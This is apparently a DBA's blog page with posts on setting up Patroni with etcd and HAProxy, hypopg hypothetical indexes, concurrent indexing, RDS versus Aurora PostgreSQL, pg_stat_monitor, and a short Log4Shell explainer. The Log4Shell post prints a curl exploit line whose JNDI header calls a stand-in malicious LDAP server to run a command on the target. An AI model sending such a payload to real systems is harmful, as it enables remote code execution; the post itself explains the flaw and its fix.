
Monday, December 30, 2024

STEP BY STEP - HOW TO SETUP PATRONI WITH ETCD AND HAPROXY


I have taken 2 CentOS EC2 instances:

Machine   Public IP       Private IP
VM1       3.91.208.95     172.31.95.231
VM2       54.146.6.100    172.31.90.199

Step 1 – ETCD INSTALLATION AND CONFIGURATION

- Install etcd on VM1 and VM2.

# sudo yum install etcd

- Edit the configuration file on each node at /etc/etcd/etcd.conf.

Below is the conf file for VM1 after editing. Make sure to uncomment the lines as shown below and keep the appropriate values. If you want to add another node to the cluster, add its IP to the ETCD_INITIAL_CLUSTER parameter.

 [root@ip-172-31-95-231 etcd]# cat etcd.conf

ETCD_DATA_DIR="/var/lib/etcd/default.etcd"

ETCD_LISTEN_PEER_URLS="http://172.31.95.231:2380"

ETCD_LISTEN_CLIENT_URLS="http://172.31.95.231:2379"

ETCD_NAME="vm1"

#[Clustering]

ETCD_INITIAL_ADVERTISE_PEER_URLS="http://172.31.95.231:2380"

ETCD_ADVERTISE_CLIENT_URLS="http://172.31.95.231:2379"

ETCD_INITIAL_CLUSTER="vm1=http://172.31.95.231:2380,vm2=http://172.31.90.199:2380"

  =============Conf file for vm2=============

 [root@ip-172-31-90-199 etcd]# cat etcd.conf

ETCD_DATA_DIR="/var/lib/etcd/default.etcd"

ETCD_LISTEN_PEER_URLS="http://172.31.90.199:2380"

ETCD_LISTEN_CLIENT_URLS="http://172.31.90.199:2379"

ETCD_NAME="vm2"

#[Clustering]

ETCD_INITIAL_ADVERTISE_PEER_URLS="http://172.31.90.199:2380"

ETCD_ADVERTISE_CLIENT_URLS="http://172.31.90.199:2379"

ETCD_INITIAL_CLUSTER="vm1=http://172.31.95.231:2380,vm2=http://172.31.90.199:2380"

#ETCD_INITIAL_CLUSTER_TOKEN="etcd-cluster"
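The two conf files differ only in the node name and IP addresses; the ETCD_INITIAL_CLUSTER value is simply a comma-separated list of name=peer-URL pairs. As a sketch, it can be generated from name:IP pairs with a small shell helper (build_initial_cluster is my own helper name, not an etcd tool):

```shell
#!/bin/sh
# Build the ETCD_INITIAL_CLUSTER value from name:IP pairs.
build_initial_cluster() {
  out=""
  for pair in "$@"; do
    name=${pair%%:*}          # part before the first ':'
    ip=${pair#*:}             # part after the first ':'
    entry="${name}=http://${ip}:2380"
    [ -z "$out" ] && out="$entry" || out="$out,$entry"
  done
  echo "$out"
}

# Nodes from this setup:
build_initial_cluster vm1:172.31.95.231 vm2:172.31.90.199
# -> vm1=http://172.31.95.231:2380,vm2=http://172.31.90.199:2380
```

Adding a third node is then just one more name:IP argument plus restarting etcd with the new value on every member.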

 Step 2 – Start ETCD on VM1 and VM2

              # sudo systemctl start etcd

Check the status of etcd after starting it:

# sudo systemctl status etcd

 

Step 3 – Check the cluster member from VM1 and VM2

VM1-

# ETCDCTL_API=3 etcdctl member list --write-out=table --endpoints=http://172.31.95.231:2379

VM2 –

# ETCDCTL_API=3 etcdctl member list --write-out=table --endpoints=http://172.31.90.199:2379


Step 4 - Install PostgreSQL 12 on VM1 and VM2

# sudo yum -y install https://download.postgresql.org/pub/repos/yum/reporpms/EL-7-x86_64/pgdg-redhat-repo-latest.noarch.rpm

# sudo yum -y install epel-release yum-utils

# sudo yum-config-manager --enable pgdg12

# sudo yum install postgresql12-server postgresql12 postgresql12-contrib

Step 5 - Install Python package manager on VM1 and VM2

# sudo yum install python-pip

Step 6 - Upgrade Python package manager VM1 and VM2

# sudo pip install --upgrade "pip < 21.0"

Step 7 - Install Python setuptools

#sudo pip install --upgrade setuptools

Step 8 - Install PostgreSQL database adapter for the Python

#sudo pip install psycopg2-binary

Step 9 - Install Python library to access installed packages metadata

# sudo pip install importlib-metadata

Step 10 – Install Python wheel

# sudo pip install wheel

Step 11 - Install Patroni

# sudo pip install patroni

Step 12 - Install Python etcd client

# sudo pip install python-etcd

Step 13 – Configure the Patroni config file on VM1 and VM2.

I have created the config file named pg.yml under /var/lib/pgsql/ on both nodes. It must be properly formatted YAML, otherwise there will be lots of issues, so I am sharing the way it should be formatted.

pg.yml in VM1 –
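A minimal pg.yml for VM1 would look something like the following. This is a sketch, not the exact file from the setup: the scope/namespace names and the passwords are assumptions you should adjust for your environment.

```yaml
scope: postgres-cluster            # cluster name (assumption)
namespace: /db/                    # etcd key prefix (assumption)
name: vm1

restapi:
  listen: 172.31.95.231:8008
  connect_address: 172.31.95.231:8008

etcd:
  host: 172.31.95.231:2379

bootstrap:
  dcs:
    ttl: 30
    loop_wait: 10
    retry_timeout: 10
    maximum_lag_on_failover: 1048576
    postgresql:
      use_pg_rewind: true
  initdb:
    - encoding: UTF8
  pg_hba:
    - host replication replicator 172.31.0.0/16 md5
    - host all all 0.0.0.0/0 md5

postgresql:
  listen: 172.31.95.231:5432
  connect_address: 172.31.95.231:5432
  data_dir: /tmp/data              # matches the initdb output shown in step 16
  bin_dir: /usr/pgsql-12/bin
  authentication:
    replication:
      username: replicator
      password: rep-pass           # assumption
    superuser:
      username: postgres
      password: postgres-pass      # assumption
  parameters:
    unix_socket_directories: '/tmp'
```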

                               

pg.yml  in VM2 –
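VM2's file is identical apart from the node name and the addresses. Only the fields that differ are shown here (again a sketch):

```yaml
name: vm2

restapi:
  listen: 172.31.90.199:8008
  connect_address: 172.31.90.199:8008

etcd:
  host: 172.31.90.199:2379

postgresql:
  listen: 172.31.90.199:5432
  connect_address: 172.31.90.199:5432
```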


                                    


Step 14 – Change the ownership of the Patroni config file (pg.yml) to postgres:postgres

# sudo chown postgres:postgres /var/lib/pgsql/pg.yml

Step 15 – Login as a Postgres user and make the directory for Patroni on VM1 and VM2.

# su - postgres

# mkdir /var/lib/pgsql/patroni

Step 16 – Start Patroni on VM1 and VM2. Run below command as Postgres user.

===============From VM1 output should be as below============

-bash-4.2$ patroni pg.yml

The files belonging to this database system will be owned by user "postgres".

This user must also own the server process.

The database cluster will be initialized with locale "en_US.UTF-8".

The default text search configuration will be set to "english".

Data page checksums are disabled.

creating directory /tmp/data ... ok

creating subdirectories ... ok

selecting dynamic shared memory implementation ... posix

selecting default max_connections ... 100

selecting default shared_buffers ... 128MB

selecting default time zone ... UTC

creating configuration files ... ok

running bootstrap script ... ok

performing post-bootstrap initialization ... ok

syncing data to disk ... ok

initdb: warning: enabling "trust" authentication for local connections

You can change this by editing pg_hba.conf or using the option -A, or

--auth-local and --auth-host, the next time you run initdb.

Success. You can now start the database server using:

    /usr/pgsql-12/bin/pg_ctl -D /tmp/data -l logfile start

 2022-04-21 10:58:56.886 UTC [29955] LOG:  starting PostgreSQL 12.10 on x86_64-pc-linux-gnu, compiled by gcc (GCC) 4.8.5 20150623 (Red Hat 4.8.5-44), 64-bit

2022-04-21 10:58:56.886 UTC [29955] LOG:  listening on IPv4 address "172.31.95.231", port 5432

2022-04-21 10:58:56.890 UTC [29955] LOG:  listening on Unix socket "/tmp/.s.PGSQL.5432"

2022-04-21 10:58:56.907 UTC [29955] LOG:  redirecting log output to logging collector process

2022-04-21 10:58:56.907 UTC [29955] HINT:  Future log output will appear in directory "log".

172.31.95.231:5432 - rejecting connections

172.31.95.231:5432 - accepting connections

^C-bash-4.2$

 ==================From VM2 output should be as below========

-bash-4.2$ patroni pg.yml

172.31.90.199:5432 - no response

2022-04-21 11:24:11.514 UTC [4032] LOG:  starting PostgreSQL 12.10 on x86_64-pc-linux-gnu, compiled by gcc (GCC) 4.8.5 20150623 (Red Hat 4.8.5-44), 64-bit

2022-04-21 11:24:11.514 UTC [4032] LOG:  listening on IPv4 address "172.31.90.199", port 5432

2022-04-21 11:24:11.517 UTC [4032] LOG:  listening on Unix socket "/tmp/.s.PGSQL.5432"

2022-04-21 11:24:11.530 UTC [4032] LOG:  redirecting log output to logging collector process

2022-04-21 11:24:11.530 UTC [4032] HINT:  Future log output will appear in directory "log".

172.31.90.199:5432 - accepting connections

172.31.90.199:5432 - accepting connections

-bash-4.2$

Step 17 – Check the status of Patroni from VM1 and VM2.

# systemctl status patroni
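Step 16 started Patroni in the foreground, so for systemctl to manage it a unit file is needed. A sketch of such a unit (the patroni binary path depends on how pip installed it, so treat the paths as assumptions):

```ini
# /etc/systemd/system/patroni.service
[Unit]
Description=Patroni PostgreSQL HA
After=network.target etcd.service

[Service]
Type=simple
User=postgres
Group=postgres
ExecStart=/usr/local/bin/patroni /var/lib/pgsql/pg.yml
KillMode=process
Restart=no

[Install]
WantedBy=multi-user.target
```

After placing the file, run `sudo systemctl daemon-reload` and `sudo systemctl enable --now patroni`.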



VM2 –


Step 18 – Check if all the cluster nodes are part of Patroni configuration.

VM1 –

# patronictl -c /var/lib/pgsql/pg.yml list


VM2 –

#patronictl -c /var/lib/pgsql/pg.yml list


Step 19 – Check if the Postgres cluster is started on VM1 and VM2 (I had to manually start the cluster on VM2). Run the command below to check which node is the primary: if pg_is_in_recovery() returns 'f', the node is the primary; 't' means it is a replica.

-bash-4.2$ ./psql -p 5432 -h 172.31.95.231 -U postgres postgres

psql (12.10)

postgres=# select pg_is_in_recovery();

 pg_is_in_recovery

-------------------

 f

VM2 -

-bash-4.2$ ./psql -p 5432 -h 172.31.90.199 -U postgres postgres

psql (12.10)

Type "help" for help.

postgres=# select pg_is_in_recovery();

 pg_is_in_recovery

-------------------

 t
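Mapping that flag to a role can also be scripted. A small sketch (the commented loop shows how it would be driven with psql, which is assumed to be on the PATH):

```shell
#!/bin/sh
# Map the pg_is_in_recovery() flag to a role name:
# 'f' (not in recovery) means primary, 't' means replica.
role_from_flag() {
  case "$1" in
    f) echo primary ;;
    t) echo replica ;;
    *) echo unknown ;;
  esac
}

# Driving it against both nodes (IPs from this setup):
# for node in 172.31.95.231 172.31.90.199; do
#   flag=$(psql -At -h "$node" -U postgres -c 'select pg_is_in_recovery()' postgres)
#   echo "$node: $(role_from_flag "$flag")"
# done

role_from_flag f   # -> primary
role_from_flag t   # -> replica
```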

Step 20 – Perform failover testing

[root@ip-172-31-95-231 ~]# patronictl -c /var/lib/pgsql/pg.yml failover

Candidate ['vm2'] []: vm2



Step 21 – Install HAProxy on VM1

#sudo yum install haproxy

Step 22 – Configure SELinux to allow HAProxy to connect to TCP port 5432

              # sudo setsebool -P haproxy_connect_any 1

Step 23 – Configure the HAProxy config file, located at /etc/haproxy/haproxy.cfg.

Modify this configuration file as shown below.
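A typical Patroni-aware haproxy.cfg looks something like the following, along the lines of the template shipped with Patroni. It health-checks each node's Patroni REST API on port 8008 (which returns 200 only on the current primary) and listens on port 5000, matching the psql connection in step 25. The stats port and timeout values here are assumptions to adjust:

```cfg
global
    maxconn 100

defaults
    log global
    mode tcp
    retries 2
    timeout client 30m
    timeout connect 4s
    timeout server 30m
    timeout check 5s

listen stats
    mode http
    bind *:7000
    stats enable
    stats uri /

listen postgres
    bind *:5000
    option httpchk
    http-check expect status 200
    default-server inter 3s fall 3 rise 2 on-marked-down shutdown-sessions
    server vm1 172.31.95.231:5432 maxconn 100 check port 8008
    server vm2 172.31.90.199:5432 maxconn 100 check port 8008
```

With this in place, a failover makes the old primary's health check start returning non-200, and HAProxy routes new connections on port 5000 to the new primary.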

  

Step 24 - Start the HAProxy server and check the status

#systemctl start haproxy

# systemctl status haproxy

     


             

Step 25 - Check by connecting through HAProxy; psql should be routed to the current primary.

-bash-4.2$ ./psql -p 5000 -h 172.31.95.231 -U postgres postgres

psql (12.10)

Type "help" for help.

 

postgres=#  select inet_server_addr();

 inet_server_addr

------------------

 172.31.95.231

(1 row)

VM2 is my current primary –


 ====================THE END=======================

 

Hypothetical index in Postgres

A hypothetical index in PostgreSQL is a special type of index that doesn't actually exist physically on disk but is "imagined" or "simulated" by PostgreSQL. This allows you to evaluate the potential benefits of an index without incurring the cost of creating it.

Hypothetical indexes are used primarily for performance tuning and query optimization. You can analyze how a query would behave if a particular index were to exist, helping you decide whether creating the index is worthwhile.

#Install the extension

CREATE EXTENSION hypopg ;

\dx

Create a hypothetical index

 CREATE TABLE hypo (id integer, val text) ;

INSERT INTO hypo SELECT i, 'line ' || i FROM generate_series(1, 100000) i ;

VACUUM ANALYZE hypo ;

EXPLAIN SELECT val FROM hypo WHERE id = 1;

SELECT * FROM hypopg_create_index('CREATE INDEX ON hypo (id)') ;

EXPLAIN SELECT val FROM hypo WHERE id = 1;

EXPLAIN ANALYZE SELECT val FROM hypo WHERE id = 1;

  

Manipulate hypothetical indexes

SELECT * FROM hypopg_list_indexes ;

SELECT * FROM hypopg() ;

SELECT indexname, hypopg_get_indexdef(indexrelid) FROM hypopg_list_indexes ;

SELECT hypopg_create_index('CREATE INDEX ON hypo (id, val text_pattern_ops)');

EXPLAIN SELECT * FROM hypo
WHERE id < 1000 AND val LIKE 'line 100000%';

 

How to do index size estimation?

SELECT indexname,pg_size_pretty(hypopg_relation_size(indexrelid))

FROM hypopg();

 

Test for size validation :

CREATE INDEX ON hypo (id);

CREATE INDEX ON hypo (id, val text_pattern_ops);

SELECT relname,pg_size_pretty(pg_relation_size(oid))

FROM pg_class WHERE relkind = 'i' AND relname LIKE '%hypo%';

  


Concurrent indexes in Postgres

A concurrent index in PostgreSQL refers to an index that is created or rebuilt in a way that allows normal operations (INSERT, UPDATE, DELETE, SELECT) to continue on the table during the process. This feature is especially useful in production environments where downtime or blocking operations need to be minimized.

 Demo -

 create table demo_table ( id int, name varchar(100));

insert into demo_table

select id.*, md5(id::varchar) from generate_series(1,200000) id;

create index idx_id on demo_table(id);

delete from demo_table where id='100000';

Concurrent index demo

drop index idx_id;

create  index concurrently idx_id on demo_table(id);

  

Note: if the creation fails, the index still exists in an INVALID state and needs to be dropped:

 

\d demo_table

explain select * from demo_table where id= 100000;

select relpages from pg_class where relname = 'idx_id';

Note - When a CREATE INDEX operation fails in concurrent mode, make sure that you drop the invalid index immediately.

One more thing to keep in mind: when you create an index concurrently and another session is already modifying the data, the CREATE INDEX command waits until that other operation completes.


Wednesday, December 14, 2022

Differences between RDS PostgreSQL and Aurora PostgreSQL


1. Storage Differences

RDS PostgreSQL

RDS PostgreSQL uses Amazon Elastic Block Store (EBS). All data and logs are kept on the EBS volume attached to the instance. An EBS volume is localized to a single Availability Zone and cannot be shared by multiple EC2 instances.

RDS PostgreSQL storage can grow up to 64 TB.

RDS PostgreSQL automatically scales storage up in 5 GB increments.

Amazon Aurora PostgreSQL

Aurora uses distributed storage that is replicated across three Availability Zones.

Amazon Aurora PostgreSQL can grow up to 128 TB.

Aurora PostgreSQL automatically scales storage up in chunks of 10 GB.

2. Replica Differences

RDS PostgreSQL –

RDS uses asynchronous streaming replication between the primary and read replicas.

A maximum of 5 read replicas can be added to RDS PostgreSQL.

Replication lag is in seconds; at times it can be as high as 30 seconds.

RDS supports cross-region replication.

Aurora PostgreSQL –

Aurora shares the storage tier between the primary and its read replicas: all replicas in an Aurora cluster share the same storage volume. Aurora does not depend on streaming replication; all replication happens at the storage tier, so it is extremely efficient and does not put any load on the compute resources.

Aurora supports up to 15 read replicas.

Replication lag is in milliseconds.

Aurora supports same-region replication because all read replicas share the storage tier, which is spread across multiple Availability Zones in the same region.

3. DR Strategies, High Availability and Failover

From a disaster recovery perspective, cross-region replication is an important concept, and we have seen that RDS PostgreSQL supports cross-region replication.

Aurora does not support cross-region read replicas in the same way, but DR strategies can be implemented by way of Aurora Global Database.

For high availability, RDS PostgreSQL can be set up in Multi-AZ mode; one primary instance and one standby instance across two AZs is referred to as a Multi-AZ instance deployment.

In case of any failure, RDS automatically fails over to the standby instance (this failover can also be planned). In such a setup the standby instance cannot be used for reads.

If there is more than one standby instance in the Multi-AZ RDS setup, the setup is referred to as a Multi-AZ cluster deployment. On failure of the primary instance, or on a request for a manual failover, RDS promotes one of the standby instances to become the primary. In this setup the standby instances can be used as read replicas.

RDS PostgreSQL –

RDS supports failover by way of multi AZ instance or cluster setup.

Failover takes 60-120 sec.

RDS uses synchronous replication between primary and standby instances.

Aurora PostgreSQL –

Aurora supports failover by way of read replicas.

Failover takes about 30 seconds.

Aurora uses the storage tier shared between the instances to meet the replication requirement.

4.Backups

Both RDS and Aurora PostgreSQL carry out automated backups and they also allow for manual backups. The differences are in the frequency of backups and how the backups are created.

RDS PostgreSQL –

RDS PostgreSQL takes a daily backup during the backup window, which is controlled by the user.

There is a slight performance impact during backup.

In the case of Multi-AZ, backups are taken from the standby instance.

Point-in-time recovery is slower than with Aurora PostgreSQL.

Aurora PostgreSQL

Aurora PostgreSQL carries out continuous incremental backups.

No performance impact during backup.

Backups are carried out at the storage tier.

Point-in-time recovery is faster than with RDS PostgreSQL.


Tuesday, December 14, 2021

What is Log4JShell Vulnerability and how to remediate it

The Log4j vulnerability, also referred to as Log4Shell, can be exploited to take complete control of the target and run arbitrary code.

It affects log4j versions 2.0-beta9 through 2.14.1; the advisory at the time of writing is to update to the fixed release 2.15.0 or greater.

The Exploit

The most simplistic example being:  

curl https://target.domain.tld -H 'X-Api-Version: ${jndi:ldap://malicious_server/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}' -o/dev/null -v

When executed, this runs touch /tmp/pwned on the target system.

There are many such examples being tracked at the time of writing that seek either to exploit the issue or at least to confirm its presence.
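A quick and deliberately naive way to sketch detection is to look for the literal lookup prefix in request data or logs. Real payloads are frequently obfuscated (e.g. ${${lower:j}ndi:…}), so this is illustrative only, not a WAF rule:

```shell
#!/bin/sh
# Naive check for the literal Log4Shell lookup prefix in a string.
# Obfuscated payloads (nested lookups, case tricks) will NOT be caught.
contains_jndi() {
  case "$1" in
    *'${jndi:'*) return 0 ;;   # suspicious: contains a JNDI lookup
    *)           return 1 ;;
  esac
}

# Example: the header value from the curl command above
if contains_jndi 'X-Api-Version: ${jndi:ldap://malicious_server/...}'; then
  echo "suspicious"
fi
```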

Step by Step: How to troubleshoot a slow running query in PostgreSQL

Understanding query performance patterns is, in many ways, the foundation of query performance tuning, and it dictates how a database cluster evolves. There are direct and indirect cost implications as well.

PostgreSQL provides very detailed statistics through a number of catalog views and extensions that can be easily added to provide more detailed query statistics. With each view focused on a particular aspect, the picture almost always needs to be stitched together by combining different datasets. That requires effort and still, the whole picture might not be complete.

The pg_stat_monitor extension attempts to provide a more holistic picture by providing much-needed query performance insights in a single view. The extension has been evolving over the past year and is now nearing the GA release.

Some Useful Extensions

Currently, you may be relying on a number of extensions to understand how a query behaves, the time taken in planning and execution phases, min/max/meantime values, index hits, query plan, and client application details. Here are some extensions that you might already be very familiar with.

pg_stat_activity

This view is available by default with PostgreSQL. It provides one row per server process along with current activity and query text.

In case you’d like to learn more about it, hop over to the official PostgreSQL documentation here.

pg_stat_statements

This extension is part of the contrib packages provided with the PostgreSQL server. However, you’d have to create the extension manually. It’s a query-wise aggregation of statistical data with min/max/mean/standard deviation for execution and planning times and various useful information and query text.

You can read more about pg_stat_statements at the official PostgreSQL documentation site.

auto_explain

Another useful extension provided by the PostgreSQL server. It dumps query plans into the server log for any query exceeding a time threshold specified by a GUC (Grand Unified Configuration) parameter.

You can find more about auto_explain here.

pg_stat_monitor

Whilst all the previously mentioned views/extensions are great in their own right, one needs to manually combine client/connection information from pg_stat_activity, statistical data from pg_stat_statements, and query plans from auto_explain to complete the dataset and understand query performance patterns.

And that’s precisely the pain that pg_stat_monitor alleviates.

The feature set has been growing over the past year, and it now provides, in a single view, all the performance-related information you may need to debug a poorly performing query.

Feature Set

Some features that were part of earlier releases are already discussed in this blog, however, for completeness, I’m going to discuss those here as well.

  • Time Interval Grouping: Instead of supplying one set of ever-increasing counts, pg_stat_monitor computes stats for a configured number of time intervals; time buckets. This allows for much better data accuracy, especially in the case of high resolution or unreliable networks.
  • Multi-Dimensional Grouping:  While pg_stat_statements groups counters by (userid, dbid, queryid),  pg_stat_monitor uses a more detailed group for higher precision:
    • Bucket ID (bucket),
    • User ID (userid),
    • Database ID (dbid),
    • Query ID (queryid),
    • Client IP Address (client_ip),
    • Plan ID (planid),
    • Application Name (application_name).

This allows you to drill down into the performance of queries coming from particular client addresses and applications, which we at Percona have found to be very valuable in a number of cases.

  • Capture Actual Parameters in the Queries: pg_stat_monitor allows you to choose if you want to see queries with placeholders for parameters or actual query examples.
  • Query Plan: Each SQL is now accompanied by its actual plan that was constructed for its execution. Also, we found having query parameter values is very helpful, as you can run EXPLAIN on it, or easily play with modifying the query to make it run better, as well as making communication about the query clearer when discussing with other DBAs and application developers.
  • Table Access Statistics for a Statement: This allows us to easily identify all queries that accessed a given table. This set is on par with the information provided by pg_stat_statements.
  • Histogram: Visual representation is very helpful when it can help identify issues. With the help of the histogram function, you can now view a timing/calling data histogram in response to a SQL query. And yes, it even works in psql.

  • Functions: It may come as a surprise, but we do understand that functions may internally execute statements!!! To help ease the tracking and analysis, pg_stat_monitor now provides a column that specifically helps keep track of the top query for a statement so that you can backtrack to the originating function.
  • Relation Names: Relations used in a query are available in the “relations” column of the pg_stat_monitor view. This reduces work at your end and makes analysis simpler and quicker.
  • Query Types: With query classification as SELECT, INSERT, UPDATE or DELETE, analysis becomes simpler. It’s another effort reduced at your end, and another simplification by pg_stat_monitor.

  • Query Metadata: Google's Sqlcommenter is a useful tool that in a way bridges the gap between ORM libraries and understanding database performance. And we support it. So you can now put any key-value data in comments in /* … */ syntax (see the Sqlcommenter documentation for details) in your SQL statements, and the information will be parsed by pg_stat_monitor and made available in the comments column of the pg_stat_monitor view.

  • Logging Errors and Warnings: Most monitoring/statistics collector tools and extensions only monitor successful queries, but in many cases monitoring ERROR, WARNING, and LOG messages gives meaningful information for debugging an issue. pg_stat_monitor not only monitors ERROR/WARNING/LOG queries but also collects statistics about them. In PostgreSQL, a query ending in an ERROR or WARNING has an error level (elevel), an SQL code (sqlcode), and an error message attached; pg_stat_monitor collects all of this information along with its aggregates.

We’ve Come a Long Way

What started as a concept is now nearing its final approach. The pg_stat_monitor extension has evolved and has become very feature-rich. We have no doubt about its usefulness for DBAs, performance engineers, application developers, and anyone who needs to look at query performance. We believe it can help save many hours and help identify unexpected query behaviors. 

pg_stat_monitor is available on Github. We are releasing it to get feedback from the community on what we’re doing right and what we should do differently before we release pg_stat_monitor as a generally available version to be supported for years to come.